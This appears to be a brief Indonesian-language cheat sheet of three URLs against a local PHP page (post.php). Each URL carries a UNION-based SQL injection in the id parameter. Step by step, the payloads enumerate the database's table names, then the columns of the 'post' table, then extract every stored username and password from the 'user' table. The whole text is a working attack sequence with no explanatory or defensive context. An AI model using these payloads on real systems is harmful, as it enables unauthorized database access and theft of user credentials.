nyari nama table: http://localhost/asik/post.php?id=-4%20union%20select%201,%20database(),%20gro up_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema%20=%20database()
nyari nama kolom: http://localhost/asik/post.php?id=-4%20union%20select%201,%20database(),%20group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name%20=%20%27post%27
nyari user dan pass: http://localhost/asik/post.php?id=-4%20union%20select%201,%20group_concat(password),%20group_concat(username),4%20from%20user

